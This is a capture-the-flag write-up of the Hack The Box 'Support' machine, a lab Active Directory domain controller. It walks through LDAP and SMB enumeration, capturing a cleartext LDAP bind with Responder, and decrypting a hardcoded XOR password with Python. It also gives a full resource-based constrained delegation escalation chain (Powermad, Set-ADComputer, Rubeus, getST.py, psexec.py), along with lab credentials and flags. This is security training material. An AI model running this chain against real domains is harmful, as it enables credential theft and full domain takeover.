Support

Enumeration

NMAP Scan

NMAP Showing ldap - domain - kerberos

What can we deduce from this information?

  1. This box is likely a domain controller (Kerberos on 88/tcp, LDAP on 389/tcp and DNS on 53/tcp together)

  2. We can enumerate LDAP to find domain information (users, groups, computers)

  3. MSRPC/SMB may accept a null session; once we have credentials they are also a route to a remote shell

Priorities for enumeration:

  1. SMB: shares and login access (smbclient, crackmapexec)

  2. LDAP: nmap ldap* scripts, windapsearch.py

  3. Kerberos: user enumeration once we have candidate usernames

  4. DNS: add the domain and DC hostname (support.htb, dc.support.htb) to /etc/hosts

  5. RPC: possible WinRM access once we have credentials

Enumeration goals:

  • Credentials

  • Anonymous access

  • Network shares

  • Null sessions

  • Default login passwords


ICE BREAKER!


LDAP

What is LDAP?

LDAP (Lightweight Directory Access Protocol) is the protocol used to query and modify a directory service such as Active Directory, which holds information about an organisation: its users, groups, computers and other objects. LDAP serves two purposes.

The first is to store and retrieve that directory data; the second is to authenticate users (a "bind") before they are allowed to access it. Note that a simple bind sends the password in cleartext unless the connection is protected by TLS (LDAPS on 636/tcp or StartTLS), which matters later in this box.

How to enumerate LDAP?

┌──(bsail㉿hackOn)-[~/Desktop/HTB/normal_boxes/Support]
└─$ nmap -n -sV --script "ldap*" 10.10.11.174 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 15:28 AEST
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.

Nmap scan report for 10.10.11.174
Host is up (0.024s latency).
Not shown: 990 filtered tcp ports (no-response)
Bug in ldap-brute: no string output.
Bug in ldap-brute: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-07 05:29:06Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=support,DC=htb
|       ldapServiceName: support.htb:dc$@SUPPORT.HTB
|       isGlobalCatalogReady: TRUE

|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
|       serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=support,DC=htb
|       namingContexts: CN=Configuration,DC=support,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=support,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=support,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 82028
|       dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       dnsHostName: dc.support.htb
|       defaultNamingContext: DC=support,DC=htb
|       currentTime: 20231007053907.0Z
|_      configurationNamingContext: CN=Configuration,DC=support,DC=htb
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=support,DC=htb
|       ldapServiceName: support.htb:dc$@SUPPORT.HTB
|       isGlobalCatalogReady: TRUE
|      
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
|       serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=support,DC=htb
|       namingContexts: CN=Configuration,DC=support,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=support,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=support,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 82028
|       dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
|       dnsHostName: dc.support.htb
|       defaultNamingContext: DC=support,DC=htb
|       currentTime: 20231007053907.0Z
|_      configurationNamingContext: CN=Configuration,DC=support,DC=htb
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

I used the nmap script to enumerate LDAP; alternatively you can use windapsearch: https://github.com/ropnop/windapsearch/blob/master/README.md

Using windapsearch.py

I'm unsure if I did this correctly, but it wasn't much help.

Moving forward to SMB.

Enumerating SMB

Crackmapexec

Attempt to check if CME will work on the target

As per the photo above, it seems there is a DC on port 445 with a share drive \D: that we could potentially check and identify. Let's check using --shares to see if there are more shares we can obtain.

enum4linux information

I tried running enum4linux and noticed that in the password policy section there are some errors about a session request. I am guessing there could be a credential that we can find inside this share.

Using Smbclient to access shares.

Smbclient

After going through all the trouble of getting smbclient to work after many forum dives, I managed to look at the /support-tools share. From there I downloaded the binaries and .zip files to my Kali box and started playing with them. The next goal is to enumerate the .exe and .zip contents on a Windows box.

Windows Enumeration

Moving forward, we will move to a Windows box with the following tools on hand:

  1. dnSpy.exe

  2. good ol' PowerShell

Executing UserInfo.exe

  1. If you execute the binary without its supporting files (the other files from the same archive) in the same directory, you will get this result instead (from 0xdf's guide).

  2. The correct way of executing it:

Using Windows I ran into a couple of issues:

  1. OpenVPN from HTB had issues accepting the certificate; it took me quite a while to figure out, so given the time constraints I had, I decided I needed to find another way.

  2. I realised that I only needed the binary to run so I could potentially identify the user. If there are other ways I could do this, I could maybe query it better.

Work around:

  1. Decided to find other emulators on Linux that can run the binary.

  2. I found mono & wine.

  3. wine64 had issues and required other dependencies on my own client; again, with the time constraints I had, I decided to use mono, and it seems to work fine.

Obtaining User Credentials

Tools:

  • Mono: an open-source .NET runtime that runs the .NET binary on Linux

  • Responder

Strategy of this technique:

sudo responder -A -v -I eth0

Point the binary at our own IP instead of the real DC.

Before we begin, make sure the support.htb entry in /etc/hosts points to your own IP (the one on eth0), so that the binary's LDAP connection lands on Responder's listener instead of the DC.

Start Responder first (-A is analyze mode: it listens and logs but does not poison; -v is verbose; -I selects the interface) and wait for the connection from the exe.

Once Responder is running, run the binary with mono and go through the normal user lookup.

As you are playing with the executable, keep an eye on Responder's output: the binary connects to the "server" to look up the given parameters, and to do so it performs an LDAP bind on port 389. That bind is a simple bind without TLS, so nothing in the conversation is encrypted and the password shows up in plaintext in Responder's output.

Note that this can also be done using Wireshark.

Password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
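What Responder and Wireshark are looking at on the wire is an LDAPv3 BindRequest whose authentication choice is "simple", i.e. the password as a plain octet string inside a BER-encoded message. The following is an added example, not code from this writeup or from UserInfo.exe: a minimal BER encoder/decoder that builds such a BindRequest for the credentials found above and parses it back the way a listener like Responder's LDAP module does. The bind name support\ldap and the password are the values from this box; the message ID is constructed.

```python
"""Encode and decode an LDAPv3 BindRequest (RFC 4511) with hand-written BER,
to show why a simple bind over plain 389/tcp leaks the password.

Added example; not part of the original writeup or of UserInfo.exe."""

SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
APP_BIND_REQUEST = 0x60   # [APPLICATION 0] BindRequest, constructed
CTX_SIMPLE = 0x80         # AuthenticationChoice: simple [0] OCTET STRING
CTX_SASL = 0xA3           # AuthenticationChoice: sasl [3] SaslCredentials (constructed)


def ber_len(n: int) -> bytes:
    """BER length: one byte below 128, otherwise 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(content)) + content


def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, content, position after the element) for the element at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                       # long-form length
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def encode_simple_bind(message_id: int, name: str, password: str) -> bytes:
    """LDAPMessage { messageID, BindRequest { version 3, name, simple password } }.
    message_id is assumed to be below 128 so it fits one INTEGER byte."""
    bind = tlv(APP_BIND_REQUEST,
               tlv(INTEGER, b"\x03")
               + tlv(OCTET_STRING, name.encode())
               + tlv(CTX_SIMPLE, password.encode()))   # the password, as-is
    return tlv(SEQUENCE, tlv(INTEGER, message_id.to_bytes(1, "big")) + bind)


def decode_bind(packet: bytes):
    """Parse one LDAPMessage; return a dict for a BindRequest, None for anything else.
    This is the same work a listener such as Responder's LDAP module does."""
    tag, body, _ = read_tlv(packet)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = read_tlv(body)
    tag, op, _ = read_tlv(body, pos)
    if tag != APP_BIND_REQUEST:
        return None
    _, version, pos = read_tlv(op)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    info = {"message_id": int.from_bytes(mid, "big"),
            "version": version[0],
            "name": name.decode("utf-8", "replace")}
    if auth_tag == CTX_SIMPLE:
        info["auth"] = "simple"
        info["password"] = auth.decode("utf-8", "replace")   # cleartext on the wire
    elif auth_tag == CTX_SASL:
        info["auth"] = "sasl"                                # e.g. GSS-SPNEGO: no password here
        info["mechanism"] = read_tlv(auth)[1].decode("utf-8", "replace")
    else:
        info["auth"] = "unknown"
    return info


if __name__ == "__main__":
    # Constructed packet carrying the credentials UserInfo.exe uses for its bind
    pkt = encode_simple_bind(1, "support\\ldap", "nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz")
    print(pkt.hex())
    print(decode_bind(pkt))
```

The SASL branch is there to make the contrast visible: a bind that negotiates Kerberos or NTLM through GSS-SPNEGO carries a mechanism name and tokens, not the password, which is why Responder only gets a cleartext password from applications that chose the simple bind.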

Password Decryption Script (from the dnSpy Decompile)

The second way to obtain the password is to re-implement, in a scripting language, the decryption routine that dnSpy shows inside the binary: the stored value is base64-encoded, and each byte is XORed with the matching byte of the repeating key "armando" and with the constant 223.

import base64

# Values recovered from the decompiled binary (dnSpy)
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
_key = "armando"


# base64-decode into a mutable byte array
decode_this = bytearray(base64.b64decode(enc_password))

# Each byte was XORed with the matching key byte (the key repeats) and the constant 223;
# XOR is its own inverse, so applying the same operation recovers the plaintext
for x in range(len(decode_this)):
    decode_this[x] ^= ord(_key[x % len(_key)]) ^ 223

# Print decoded value
decoded_pass = decode_this.decode()

print(decoded_pass)

Result:

Moving on to the LDAP research.

Point to note: there are other ways to obtain the password, and there are multiple ways to decode it using a script. I am by no means a master, and it took me a good couple of days of researching how base64 and XOR work to decode this.
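Since XOR is its own inverse, the same routine both encrypts and decrypts, and once a plaintext is in hand (for instance the one Responder captured) the key itself falls out of the ciphertext. The following is an added example that goes a little beyond the script above and is not the author's code: it wraps the decode in a function, adds the encode direction for a round-trip check, and recovers the repeating key from ciphertext plus known plaintext. The ciphertext, key and constant are the values from the decompiled binary.

```python
"""Repeating-key XOR as used by UserInfo.exe: decrypt, encrypt, and recover the key
from a known plaintext. Added example; not the writeup's code."""
import base64

# Values taken from the decompiled binary (dnSpy), as in the script above
ENC_B64 = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = "armando"
CONST = 223


def xor_stream(data: bytes, key: bytes, const: int) -> bytes:
    """byte[i] ^ key[i mod len(key)] ^ const: the transform the binary applies."""
    return bytes(b ^ key[i % len(key)] ^ const for i, b in enumerate(data))


def decrypt(enc_b64: str, key: str = KEY, const: int = CONST) -> str:
    """base64-decode, then undo the XOR (an involution, so the same function works)."""
    return xor_stream(base64.b64decode(enc_b64), key.encode(), const).decode()


def encrypt(plaintext: str, key: str = KEY, const: int = CONST) -> str:
    """The reverse direction: what the developer ran to produce the stored string."""
    return base64.b64encode(xor_stream(plaintext.encode(), key.encode(), const)).decode()


def recover_key(enc_b64: str, known_plaintext: str, const: int = CONST) -> str:
    """Given ciphertext and plaintext (e.g. the Responder capture), the keystream is
    c ^ p ^ const; the key is its shortest repeating pattern. Only as many key bytes
    as there are plaintext bytes can be recovered, and if const is unknown you get
    key ^ const instead, which decrypts just as well."""
    ct = base64.b64decode(enc_b64)
    pt = known_plaintext.encode()
    n = min(len(ct), len(pt))
    stream = bytes(ct[i] ^ pt[i] ^ const for i in range(n))
    for period in range(1, n + 1):
        if all(stream[i] == stream[i % period] for i in range(n)):
            return stream[:period].decode("latin-1")
    return stream.decode("latin-1")   # defensive; period == n always matches above


if __name__ == "__main__":
    pw = decrypt(ENC_B64)
    print("decrypted :", pw)
    print("round-trip:", encrypt(pw) == ENC_B64)
    print("key       :", recover_key(ENC_B64, pw))
```

The point of recover_key is the security lesson behind this box: a fixed key XORed into a stored password is obfuscation, not encryption, and one captured plaintext (or one decompile) defeats it for every value protected with the same key.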

Querying LDAP with ldapsearch using the obtained password

Tools used:

ldapsearch

ldapdomaindump

Goal:

  1. Look for further credentials (usernames)

  2. Look for a password

I was having a hard time using the actual tool; it took me at least a couple of hours to figure out whether the VPN was broken or I was just having a brain fart about why LDAP could not bind. However, as the screenshot below shows, reversing the order works miracles. I found the solution on a specific website and will post the link below.

Using the LDAP query below I managed to look at the LDAP information and the users that are on the server.

The result is a large block of text, so I will process it:
ldapsearch -x -b "DC=support,DC=htb" -H "ldap://support.htb" -D "support\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

To validate this, we will use ldapdomaindump

ldapdomaindump ldap://support.htb -u "support\\ldap" -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 

After the request you will receive multiple files, including:

  • HTML

  • JSON

  • .grep (tab-separated, for grep/awk)

Since I'm super lazy, I spun up a quick python3 server in the directory and started browsing/enumerating the dump files.

Example of Python3 server Set up:

Here you can see the requests that I am making using my browser

Credential Hunting

Looking at the files obtained from the dump, I quickly checked the domain users section, as it usually has something interesting going on.

Found out that support is a user as well.

Expanding on the "support" credential

Searching for more information about support, we find that it is a member of the "Remote Management Users" and "Shared Support Account" groups. BINGO! That is our username, and Remote Management Users membership means it can log in over WinRM.

Looking for the password

Obtained from domain_users.json (after hours and hours of searching)...
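Both the raw ldapsearch output above and the domain_users.json dump can be sifted programmatically instead of by eye. As an added example, not the author's code, here is a small LDIF parser for ldapsearch output plus a hunt over it for Remote Management Users membership and for free-text attributes (description, info, comment) where passwords tend to end up. The LDIF is constructed to resemble this domain's output; its attribute values, including the sample password text, are made up.

```python
"""Parse ldapsearch (LDIF) output and sift it for the things the credential hunt
above looks for by hand: group membership and free-text attributes that often
carry passwords.

Added example; not the writeup's code. The LDIF below is constructed to look like
ldapsearch output for this domain; the attribute values are made up."""
import base64

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=support,DC=htb> with scope subtree
#
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
cn: support
sAMAccountName: support
memberOf: CN=Shared Support Account,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
info: temp password Example-Pass-123 (constructed sample value)
description:: U2hhcmVkIGFjY291bnQ=

dn: CN=ldap,CN=Users,DC=support,DC=htb
objectClass: user
cn: ldap
sAMAccountName: ldap
description: LDAP bind account used by
  UserInfo.exe

# search result
search: 2
result: 0 Success
"""

# Attributes that are free text and frequently hold credentials or hints
FREE_TEXT_ATTRS = ("description", "info", "comment", "userPassword", "unixUserPassword")


def parse_ldif(text: str) -> list:
    """Return one {attribute: [values]} dict per entry. Handles '#' comments,
    folded lines (continuation lines start with a space) and '::' base64 values."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]      # unfold: drop the single leading space
        else:
            logical.append(raw)
    entries, current = [], None
    for line in logical:
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = None
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):     # attr:: base64
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if attr == "dn":
            if current:
                entries.append(current)
            current = {"dn": [value]}
        elif current is not None:
            current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def hunt(entries: list, group_keyword: str = "Remote Management Users") -> list:
    """Flag users that are in an interesting group or carry free-text attributes."""
    findings = []
    for e in entries:
        name = e.get("sAMAccountName", e["dn"])[0]
        in_group = any(group_keyword.lower() in g.lower() for g in e.get("memberOf", []))
        notes = {a: e[a] for a in FREE_TEXT_ATTRS if a in e}
        if in_group or notes:
            findings.append({"user": name, "remote_mgmt": in_group, "notes": notes})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_ldif(SAMPLE_LDIF)):
        print(f)
```

Run the ldapsearch command above with its output redirected to a file and feed that file to parse_ldif instead of SAMPLE_LDIF. The base64 handling matters: Active Directory returns non-ASCII or leading-space values as "attr:: base64", and a grep for "password" over the raw LDIF silently misses those.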

Credentials For Reverse Shell

Username: support
Password: "Ironside47pleasure40Watchful"

Reverse Shell

Rev Shell
User.txt
d9e79134f2ed503af804ed93b84d0842

Priv Escalation Enumeration

Enumerate Remote Box (For more information)

Tools:

  1. Sharphound

  2. BloodHound

Uploaded SharpHound to the box:

This directory contains most of my tools for Windows enumeration.

In the screenshot below you will see the information SharpHound was run with; make sure to download the output file and upload it to BloodHound.

Upload the result to BloodHound and look for the node called SHARED.DC.SUPPORT.HTB: it has GenericAll over DC.SUPPORT.HTB, which is full control of the DC's computer object, roughly a read-write-execute level of permission. That write access is what lets us change the DC's delegation settings in the next section.

Taking ROOT

TOOLS:

PowerView.ps1, Powermad.ps1, Rubeus.exe

Credit to CyberGladius for the PrivEsc walkthrough. I tried to do it on my own; however, I'm not capable enough yet in the AD PrivEsc area. I learned quite a few techniques along the way, and I changed some paths to ones I felt comfortable doing.

#Variables: the fake computer we will create and the target (the DC)
Set-Variable -Name "UnknownPC" -Value "NotTrue"
Set-Variable -Name "target_PC" -Value "DC"

#Add fake computer object to AD (Powermad). Any domain user can do this while ms-DS-MachineAccountQuota is above 0 (default 10)
New-MachineAccount -MachineAccount (Get-Variable -Name "UnknownPC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose




#Get SID of the target PC (PowerView), for reference
Get-DomainComputer (Get-Variable -Name "target_PC").Value | select -expand objectsid

Account (used for the Rubeus hash below):
NotTrue$
123456

Double check that the fake computer was created:

#Allow the fake computer to delegate to the target: this writes the fake computer's SID into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (resource-based constrained delegation). It needs write access on the DC object, which GenericAll gives us
Set-ADComputer (Get-Variable -Name "target_PC").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "UnknownPC").Value + '$')

#Optional ACL check on the domain object (can be ignored)
#(Get-Acl -Path "AD:DC=SUPPORT,DC=HTB").Access | Where-Object {$_.IdentityReference -Like 'support\NotTrue$'}


#Validate the previous command: the attribute should now list NotTrue$
Get-ADComputer (Get-Variable -Name "target_PC").Value -Properties PrincipalsAllowedToDelegateToAccount
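Set-ADComputer -PrincipalsAllowedToDelegateToAccount hides what is actually written: a binary security descriptor in the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute whose DACL holds one access-allowed ACE per principal that may delegate. The following is an added example and not the author's or any tool's code. It builds that self-relative descriptor for a SID in the layout the common tools write (owner BUILTIN\Administrators, one full-control ACE per SID) and parses it back so you can confirm which accounts a DC trusts. The SID for NotTrue$ is constructed; on the box you would use the objectsid PowerView returns for the fake computer.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor
that resource-based constrained delegation relies on.

Added example; not the writeup's code and not any tool's code. Layouts follow
MS-DTYP (SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE, SID)."""
import struct

# Constructed SID for the fake computer NotTrue$; on the box use the objectsid
# that Get-DomainComputer returns for it
FAKE_PC_SID = "S-1-5-21-1111111111-2222222222-3333333333-1103"
ADMINISTRATORS_SID = "S-1-5-32-544"           # BUILTIN\Administrators, used as owner

ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF                     # SDDL CCDCLCSWRPWPDTLOCRSDRCWDWO
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACL_REVISION_DS = 4


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> revision, sub-authority count, 6-byte big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> str:
    count = data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def build_rbcd_descriptor(sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: owner = Administrators, no group/SACL,
    DACL with one ACCESS_ALLOWED_ACE (full control) per SID allowed to delegate."""
    aces = b""
    for sid in sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(ADMINISTRATORS_SID)
    header_len = 20
    offset_owner = header_len
    offset_dacl = header_len + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         offset_owner, 0, 0, offset_dacl)
    return header + owner + acl


def parse_descriptor(blob: bytes) -> dict:
    """Walk the descriptor back: control flags, owner and every ACE in the DACL."""
    _, _, control, off_owner, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    owner = bytes_to_sid(blob[off_owner:]) if off_owner else None
    aces = []
    if control & SE_DACL_PRESENT and off_dacl:
        _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
            aces.append({"type": ace_type, "mask": mask, "sid": bytes_to_sid(blob[pos + 8:pos + ace_size])})
            pos += ace_size
    return {"control": control, "owner": owner, "aces": aces}


def allowed_to_delegate(blob: bytes) -> list:
    """SIDs that the descriptor permits to act on behalf of other identities."""
    return [a["sid"] for a in parse_descriptor(blob)["aces"] if a["type"] == ACCESS_ALLOWED_ACE_TYPE]


if __name__ == "__main__":
    sd = build_rbcd_descriptor([FAKE_PC_SID])
    print(sd.hex())
    print("trusted to delegate:", allowed_to_delegate(sd))
```

Applying it means writing these bytes as the attribute value over LDAP, which Set-ADComputer does for you. The parser is the defensive half: read msDS-AllowedToActOnBehalfOfOtherIdentity back from every computer object and run it through allowed_to_delegate; any SID you did not put there is a persistence backdoor of exactly this kind.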

Rubeus.exe

#Derive the Kerberos AES256 key of the fake machine account from its password; getST.py takes this as -aesKey
./Rubeus.exe hash /password:123456 /user:NotTrue$ /domain:support.htb

####KALI SIDE/ATTACKER SIDE####

Request a service ticket from 'dc.support.htb' as the fake computer while impersonating "administrator" (S4U2self followed by S4U2proxy, which the delegation entry we just wrote allows). The -aesKey value is the one Rubeus computed above:

python3 getST.py support.htb/NotTrue -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35968C91CF211A48166F61C736CAE5BB2DD4E0F7DA1248D082C31854879BDAFB

# Point KRB5CCNAME at the saved ccache so the impacket tools use that ticket
export KRB5CCNAME=administrator.ccache

# Use psexec.py with the ticket (-k, Kerberos auth; -no-pass, no password prompt) to get a shell as administrator
psexec.py support.htb/administrator@dc.support.htb -k -no-pass

ROOT FLAG

5ca52128d3643189ae27366111a51d37

BEYOND ROOT (TBA)

Resources
